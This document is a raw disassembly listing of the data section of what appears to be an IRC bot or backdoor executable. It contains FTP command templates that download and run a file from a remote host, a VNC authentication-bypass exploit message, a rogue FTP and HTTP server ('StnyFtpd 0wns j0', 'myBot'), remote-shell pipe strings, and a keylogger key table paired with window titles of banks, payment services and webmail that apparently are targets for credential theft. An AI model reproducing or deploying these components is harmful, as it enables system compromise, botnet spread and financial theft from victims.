dd 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h, 86158899h
dd 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h, 5780EE37h
dd 4838E43h, 5180BD0Ch, 0EFAF269Ah, 0D87B5338h, 78A9269Bh
dd 877FD918h
aMmmmmmmmmmmmmm db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0
align 4
aCmdCEchoOpen_0 db 'cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >>'
; DATA XREF: sub_40E9FB+92�o
db ' ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0
aVncD_DSSAuthby db 'VNC%d.%d %s: %s - [AuthBypass]',0 ; DATA XREF: .text:0040EE25�o
align 4
aRfb03d_03d db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: .text:0040ECB2�o
align 4
word_4346DC dw 1 ; DATA XREF: .text:0040EC29�r
; sub_41B55B+24�r ...
align 10h
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_40EF1C+130�o
; sub_41A1B1+21�o
aEchoOpenSDOE_0 db 'echo open %s %d >> o&echo user 1 >>o &echo 1 >>o &echo get %s >>o'
; DATA XREF: sub_40F108+23E�o
db ' &echo bye >>o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_40F3AA+5DA�o
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_40F3AA+5B9�o
align 4
dword_434798 dd 392C3003h, 5E5E207Ch, 534F4241h, 5E374C41h, 37C205Eh
; DATA XREF: sub_40F3AA+568�o
; sub_412197+3AC�o
dd 7C312C30h, 77305020h, 75467233h, 20796C6Ch, 2C31037Ch
dd 207C2038h, 336E5730h, 203E2044h, 7325h
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_40F3AA+554�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_40F3AA+4F7�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_40F3AA+4DF�o
align 4
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_40F3AA+4CF�o
align 4
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_40F3AA+4BE�o
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_40F3AA+48B�o
align 10h
aS_1 db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_40F3AA+447�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_40F3AA+40E�o
align 10h
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_40F3AA+3E0�o
align 4
aList_0 db 'LIST',0 ; DATA XREF: sub_40F3AA+3CD�o
align 10h
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_40F3AA+395�o
align 4
aPasv db 'PASV',0 ; DATA XREF: sub_40F3AA+382�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_40F3AA+372�o
aI_0: ; DATA XREF: sub_40F3AA+35E�o
; .data:004387E8�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_40F3AA+33B�o
aA_0: ; DATA XREF: sub_40F3AA+327�o
; .data:004387F4�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: sub_40F3AA:loc_40F6B3�o
align 4
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_40F3AA+2FE�o
align 4
off_43492C dd offset dword_445750 ; DATA XREF: sub_40F3AA+2EA�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_40F3AA+2DD�o
align 4
aRest db 'REST',0 ; DATA XREF: sub_40F3AA+2C9�o
align 4
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_40F3AA+2BC�o
align 4
aSyst db 'SYST',0 ; DATA XREF: sub_40F3AA+2A8�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_40F3AA+29B�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_40F3AA+287�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_40F3AA+277�o
align 4
aUser_1 db 'USER',0 ; DATA XREF: sub_40F3AA+262�o
align 4
aSS_3 db '%s %s',0 ; DATA XREF: sub_40F3AA+251�o
align 4
a220Stnyftpd0wn db '220 StnyFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_40F3AA+1C9�o
align 4
unk_4349C4 db 2Dh ; - ; DATA XREF: sub_40FAD6+3F8�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerFailedRe db ' server failed, returned %d',0
asc_4349EC db 0Dh,0Ah,0 ; DATA XREF: sub_40FAD6+2CF�o
; sub_41AA1E+F5�o
align 10h
aGet_0 db 'GET ',0 ; DATA XREF: sub_40FAD6+269�o
align 4
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40FF31+F7�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40FF31+D4�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_40FF31+98�o
; sub_41AF8F+1AE�o
align 10h
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_40FF31+84�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_40FF31:loc_40FF97�o
align 10h
aTextHtml db 'text/html',0 ; DATA XREF: sub_40FF31+5F�o
align 4
unk_434C0C db 2Dh ; - ; DATA XREF: sub_4100B4+296�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_34 db ' failed to start worker thread, error %d',0
align 4
unk_434C44 db 2Dh ; - ; DATA XREF: sub_4100B4+212�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aWorkerThreadOf db ' worker thread of server thread: %d.',0
align 4
asc_434C78: ; DATA XREF: sub_4100B4+15A�o
unicode 0, <*>,0
aS_9 db '\%s',0 ; DATA XREF: sub_4100B4+2F�o
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_41036B+652�o
align 4
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_41036B+637�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 10h
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_41036B+61C�o
align 10h
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_41036B+58D�o
align 4
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_41036B+571�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_41036B:loc_410893�o
align 4
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_41036B+521�o
align 4
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_41036B+46E�o
align 4
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_41036B+42F�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_41036B+3F9�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_41036B:loc_410725�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_41036B+3B3�o
align 4
aSS_4 db '%s%s/',0 ; DATA XREF: sub_41036B+36C�o
align 4
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_41036B+328�o
; sub_41036B+496�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_41036B+310�o
align 4
aS_2 db '<%s>',0 ; DATA XREF: sub_41036B+2E9�o
; sub_41036B+40B�o
align 10h
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_41036B+2BF�o
aAm db 'AM',0 ; DATA XREF: sub_41036B+295�o
align 4
aPm_0 db 'PM',0 ; DATA XREF: sub_41036B+28A�o
align 4
a__ db '..',0 ; DATA XREF: sub_41036B+237�o
align 4
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_41036B+1C5�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_41036B+149�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_41036B+12D�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_41036B+F9�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_41036B+AE�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_41036B+79�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_41036B+4B�o
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_410ADC+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
dword_435120 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_410BFD+171�o
aServerFailed_0 db '- server failed, returned %d',0
align 4
aUseridUnixS db ' : USERID : UNIX : %s',0Dh,0Ah,0 ; DATA XREF: sub_410BFD+116�o
dword_435164 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_410BFD+BB�o
aClientConnecti db '- client connection from %s:%d.',0
unk_435190 db 2Dh ; - ; DATA XREF: sub_410DAB+15E�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToSta_35 db 'Failed to start client thread, error: <%d>.',0
unk_4351CC db 2Dh ; - ; DATA XREF: sub_410DAB+E9�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aClientConnec_0 db 'Client connection from IP: %s:%d, Server thread: %d.',0
align 4
unk_435214 db 2Dh ; - ; DATA XREF: sub_410F3C+1AA�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aFailedToSta_36 db 'Failed to start connection thread, error: <%d>.',0
unk_435254 db 2Dh ; - ; DATA XREF: sub_410F3C+E1�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aClientConnec_1 db 'Client connection to IP: %s:%d, Server thread: %d.',0
align 4
unk_435298 db 2Dh ; - ; DATA XREF: sub_4111C0+1E9�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedOutS db '- User logged out: <%s@%s>.',0
align 4
unk_4352C4 db 2Dh ; - ; DATA XREF: sub_4111C0+1C2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorSessionru db '- Error: SessionRun(): <%d>.',0
align 10h
unk_4352F0 db 2Dh ; - ; DATA XREF: sub_4111C0+1A2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedInS@ db '- User logged in: <%s@%s>.',0
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_4111C0+172�o
align 4
unk_43532C db 2Dh ; - ; DATA XREF: sub_4111C0+E1�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorGetpeerna db '- Error: getpeername(): <%d>.',0
align 4
unk_435358 db 2Dh ; - ; DATA XREF: sub_4113C5:loc_41140A�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aProtocolString db '- Protocol string too long.',0
align 4
unk_435384 db 2Dh ; - ; DATA XREF: sub_41141F+1B�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aLoginRejectedR db '- Login rejected, Remote user: <%s@%s>.',0
align 4
unk_4353BC db 2Dh ; - ; DATA XREF: sub_41144E+219�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorServerFai db '- Error: server failed, returned: <%d>.',0
align 4
unk_4353F4 db 2Dh ; - ; DATA XREF: sub_41144E+1FB�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToSta_37 db '- Failed to start client thread, error: <%d>.',0
align 10h
unk_435430 db 2Dh ; - ; DATA XREF: sub_41144E+177�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aClientConnec_2 db '- Client connection from IP: %s:%d, Server thread: %d.',0
unk_435474 db 2Dh ; - ; DATA XREF: sub_41144E+106�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aReadyAndWaitin db '- Ready and waiting for incoming connections.',0
align 10h
unk_4354B0 db 2Dh ; - ; DATA XREF: sub_41144E+70�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToInstal db '- Failed to install control-C handler, error: <%d>.',0
align 4
unk_4354F4 db 2Dh ; - ; DATA XREF: sub_41144E+3D�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorWsastartu db '- Error: WSAStartup(): <%d>.',0
align 10h
unk_435520 db 2Dh ; - ; DATA XREF: sub_4116D6+DE�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aWaitformultipl db '- WaitForMultipleObjects error: <%d>.',0
align 4
unk_435554 db 2Dh ; - ; DATA XREF: sub_4116D6+59�o
; sub_4116D6+8B�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCreate db '- Failed to create ReadShell session thread, error: <%d>.',0
align 4
unk_43559C db 2Dh ; - ; DATA XREF: sub_411827+AF�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExecut db '- Failed to execute shell.',0
unk_4355C4 db 2Dh ; - ; DATA XREF: sub_411827+7E�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_0 db '- Failed to create shell stdin pipe, error: <%d>.',0
align 4
unk_435604 db 2Dh ; - ; DATA XREF: sub_411827+5C�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_1 db '- Failed to create shell stdout pipe, error: <%d>.',0
unk_435644 db 2Dh ; - ; DATA XREF: sub_411920+C3�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExec_0 db '- Failed to execute shell, error: <%d>.',0
align 4
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_411920+8C�o
align 4
unk_435684 db 2Dh ; - ; DATA XREF: sub_4119F9+A1�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aSessionreadshe db '- SessionReadShellThread exited, error: <%ld>.',0
dword_4356C0 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411BCE+1B2�o
aFailedToSta_38 db '- Failed to start server on Port %d.',0
align 4
dword_4356F4 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411BCE+18F�o
aFailedToSta_39 db '- Failed to start client thread, error: <%d>.',0
align 10h
dword_435730 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411BCE+114�o
aClientConnec_3 db '- Client connection from IP: %s:%d, Server thread: %d.',0
align 4
dword_435774 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411DD3+1F9�o
aErrorFailedToC db '- Error: Failed to connect to target, returned: <%d>.',0
align 4
dword_4357B8 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411DD3+18A�o
aErrorFailedToO db '- Error: Failed to open socket(), returned: <%d>.',0
align 4
dword_4357F8 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411DD3+F2�o
aAuthentication db '- Authentication failed. Remote userid: %s != %s.',0
align 4
dword_435838 dd 4000500h, 7868746Bh, 2 dup(0) ; DATA XREF: sub_412197+404�o
aEGold db 'e-gold',0 ; DATA XREF: sub_4125FC+13�o
align 10h
dd 1Eh dup(0)
aSignIn db 'Sign In',0
dd 1Eh dup(0)
aHotmail db 'Hotmail',0
dd 1Eh dup(0)
aWindowsLiveMes db 'Windows Live Messenger',0
align 10h
dd 1Ah dup(0)
aPaypal_1 db 'PayPal',0
align 10h
dd 1Eh dup(0)
aStormpay db 'StormPay',0
align 4
dd 1Dh dup(0)
aStormpay_comAc db 'StormPay.com, Accept Online Payments',0
align 10h
dd 16h dup(0)
aWorldpay db 'WorldPay',0
align 4
dd 1Dh dup(0)
aPosteItaliane db 'Poste Italiane',0
align 4
dd 1Ch dup(0)
aFotolog_net db 'Fotolog.net',0
dd 1Dh dup(0)
aTerraFotolog db 'Terra - Fotolog',0
dd 1Ch dup(0)
aYahoo db 'Yahoo!',0
align 10h
dd 1Eh dup(0)
aDomainSearch db 'Domain Search',0
align 4
dd 1Ch dup(0)
aBienvenidoAGma db 'Bienvenido a Gmail',0
align 4
dd 1Bh dup(0)
aWelcomeToGmail db 'Welcome to Gmail',0
align 4
dd 1Bh dup(0)
aDomainNameRegi db 'Domain Name Registration',0
align 4
dd 19h dup(0)
aDomainName db 'Domain Name',0
dd 1Dh dup(0)
aMyAccountLogin db 'My Account Login',0
align 4
dd 1Bh dup(0)
aMercadolivreBr db 'MercadoLivre Brasil',0
dd 1Bh dup(0)
aWellsFargoHome db 'Wells Fargo Home Page',0
align 10h
dd 1Ah dup(0)
aRyan1918DontNe db 'Ryan1918 Dont NET :: Log in',0
dd 19h dup(0)
aEbay db 'eBay',0
align 10h
dd 1Eh dup(0)
aEbayNewUsedEle db 'eBay - New & used electronics, cars, apparel, collectibles, sport'
db 'ing goods & more at low prices',0
dd 8 dup(0)
db 49h ; I
db 6Eh, 69h, 63h
db 69h ; i
db 61h, 72h, 20h
db 73h ; s
db 65h, 73h, 69h
db 0F3h ; ó
aNebayNewUsedEl db 'neBay - New & used electronics, cars, apparel, collectibles, spor'
db 'ting goods & more at low prices',0
align 4
dd 4 dup(0)
dword_436448 dd 8 ; DATA XREF: sub_4125FC+65�o
dword_43644C dd 62h, 62000000h, 2 dup(0) ; DATA XREF: sub_4126A7:loc_412925�o
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 41000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
